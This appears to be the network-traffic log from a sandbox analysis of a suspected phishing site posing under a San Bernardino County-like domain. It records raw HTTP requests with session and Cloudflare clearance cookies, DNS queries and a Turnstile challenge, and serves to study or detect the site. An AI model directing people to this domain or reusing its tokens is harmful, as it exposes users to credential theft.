      Source: global trafficHTTP traffic detected: GET /&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8 HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://sanbernardinoscounty.telcom-info.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
      Source: global trafficHTTP traffic detected: GET /js___/66fc7b007c23b-b860da8ffc87dc502860e1b645c22d2f HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
      Source: global trafficHTTP traffic detected: GET /b_/66fc7b007c246-b860da8ffc87dc502860e1b645c22d2f HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
      Source: global trafficHTTP traffic detected: GET /js_/66fc7b007c248-b860da8ffc87dc502860e1b645c22d2f HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
      Source: global trafficHTTP traffic detected: GET /js_/66fc7b007c248-b860da8ffc87dc502860e1b645c22d2f HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET /js___/66fc7b007c23b-b860da8ffc87dc502860e1b645c22d2f HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET /b_/66fc7b007c246-b860da8ffc87dc502860e1b645c22d2f HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET /home6dca65610bad709b07a9e6041699d6ce HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
      Source: global trafficHTTP traffic detected: GET /css_/DmiM9Aw3DnV3DPQ HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
      Source: global trafficHTTP traffic detected: GET /logo_/5HwVWMJJMP8EV8z HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
      Source: global trafficHTTP traffic detected: GET /sig/c96dc13f1d8b04b0d1feb407ec1a1d4666fc7b0344ab6 HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
      Source: global trafficHTTP traffic detected: GET /2svg/ZLWhvXZy16NYSMW HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
      Source: global trafficHTTP traffic detected: GET /fav/BxFYbJCBp2C7xgu HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
      Source: global trafficHTTP traffic detected: GET /logo_/c96dc13f1d8b04b0d1feb407ec1a1d4666fc7b03449ef HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
      Source: global trafficHTTP traffic detected: GET /home6dca65610bad709b07a9e6041699d6ce HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET /2svg/ZLWhvXZy16NYSMW HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET /sig/c96dc13f1d8b04b0d1feb407ec1a1d4666fc7b0344ab6 HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET /logo_/5HwVWMJJMP8EV8z HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET /logo_/c96dc13f1d8b04b0d1feb407ec1a1d4666fc7b03449ef HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficHTTP traffic detected: GET /fav/BxFYbJCBp2C7xgu HTTP/1.1Host: sanbernardinoscounty.telcom-info.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
      Source: global trafficDNS traffic detected: DNS query: sanbernardinoscounty.telcom-info.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1121365584:1727821582:FtjyX9VbAvqmLS5-UuL06udmIDQT7dp1rW-1y8F4S1Y/8cbff7d01962c33d/bcbf9bd71f426c2 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2725sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: bcbf9bd71f426c2sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
